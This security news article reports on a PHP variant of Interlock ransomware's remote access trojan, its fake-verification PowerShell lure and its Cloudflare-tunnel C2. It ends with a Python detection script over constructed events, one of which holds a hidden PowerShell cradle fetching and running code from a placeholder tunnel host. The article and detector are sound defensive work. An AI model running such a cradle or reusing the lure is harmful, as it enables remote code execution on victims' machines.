Researchers from The DFIR Report and Proofpoint have uncovered a new and highly persistent variant of the Interlock ransomware group’s remote access trojan (RAT). Unlike its previous JavaScript-based version known as NodeSnake, the latest variant is written in PHP and is actively being deployed in an extensive campaign observed since May 2025.
The new wave of attacks has been linked to the LandUpdate808 threat cluster, also known as KongTuke. The campaigns begin with the injection of a single-line malicious script into compromised websites, which often goes unnoticed by site owners and visitors alike. The embedded JavaScript employs strict IP filtering and serves a payload that tricks users into completing ‘verification steps’, including running a PowerShell command copied from the clipboard, which triggers the installation of Interlock RAT.
Researchers have identified both PHP and Node.js variants of the malware being used in recent attacks, with the PHP version first surfacing in June 2025. The delivery mechanism for the malware appears to be transitioning to a “FileFix” variant, which has been observed dropping the PHP version and, in some cases, subsequently deploying the original Node.js-based RAT.
Once executed, Interlock RAT performs extensive automated reconnaissance. It gathers a detailed system profile using PowerShell commands to extract data such as system specifications, active processes, services, mounted drives, and network neighbors. The RAT also determines its privilege level (USER, ADMIN, or SYSTEM), allowing attackers to adjust their actions based on system access.
Communication with attacker infrastructure is maintained through Cloudflare Tunnel URLs using the trycloudflare.com domain, masking the command-and-control (C2) server's true location.
Additionally, hardcoded fallback IP addresses provide the malware with a resilient communication channel even if the primary C2 method is disrupted. The threat actor uses Remote Desktop Protocol (RDP) for lateral movement across victim environments.
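The tradecraft described above (a clipboard-pasted PowerShell cradle, a dropped PHP or Node.js runtime, and C2 over a trycloudflare.com tunnel) can be hunted for in endpoint telemetry. The following is an added example written for this article, not code from The DFIR Report or Proofpoint: it runs three simple rules over constructed Sysmon-style process-creation and network-connection events; the hostnames, paths and event shapes are assumptions for illustration.

```python
import re

TUNNEL_SUFFIX = ".trycloudflare.com"
# Download-cradle tokens typical of a PowerShell one-liner pasted from the clipboard
CRADLE_RE = re.compile(r"\b(iwr|irm|iex|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b", re.I)
RUNTIMES = ("php.exe", "node.exe")            # runtimes of the two RAT variants
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData)\\", re.I)
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PHP = r"C:\Users\alice\AppData\Roaming\php\php.exe"
# Constructed sample events (not real telemetry); Sysmon EID 1 = process create, EID 3 = network connect
SAMPLE_EVENTS = [
    {"eid": 1, "host": "ws01", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "irm https://placeholder.trycloudflare.com/a | iex"'},
    {"eid": 1, "host": "ws01", "image": PHP, "parent": PS, "cmdline": "php.exe cfg.txt"},
    {"eid": 3, "host": "ws01", "image": PHP, "dest_host": "placeholder.trycloudflare.com"},
    {"eid": 1, "host": "ws02", "image": PS, "parent": r"C:\Program Files\Vendor\agent.exe",
     "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return (host, rule, detail) for each event matching one of three rules."""
    findings = []
    for ev in events:
        img = image_name(ev["image"])
        if ev["eid"] == 1:
            cmd = ev["cmdline"]
            # Rule 1: explorer.exe -> PowerShell running a download cradle, the footprint
            # of a user pasting a fake 'verification step' (ClickFix/FileFix lure)
            if img == "powershell.exe" and image_name(ev["parent"]) == "explorer.exe" and CRADLE_RE.search(cmd):
                findings.append((ev["host"], "clickfix_cradle", cmd))
            # Rule 2: php.exe / node.exe launched from a user-writable directory
            if img in RUNTIMES and USER_WRITABLE_RE.search(ev["image"]):
                findings.append((ev["host"], "dropped_runtime", ev["image"]))
        elif ev["eid"] == 3:
            # Rule 3: non-browser process reaching a trycloudflare.com tunnel hostname;
            # legitimate tunnels exist, so treat hits as a review queue, not a block list
            if ev["dest_host"].lower().endswith(TUNNEL_SUFFIX) and img not in BROWSERS:
                findings.append((ev["host"], "cloudflare_tunnel_c2", f"{img} -> {ev['dest_host']}"))
    return findings


if __name__ == "__main__":
    for host, rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{host}\t{rule}\t{detail}")
```

The benign ws02 event (PowerShell started by a management agent, no download cradle) produces no finding, which is the point of keying rule 1 on the parent process and cradle tokens rather than on PowerShell alone.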
The campaign appears to be opportunistic and not limited to specific industries, the researchers noted.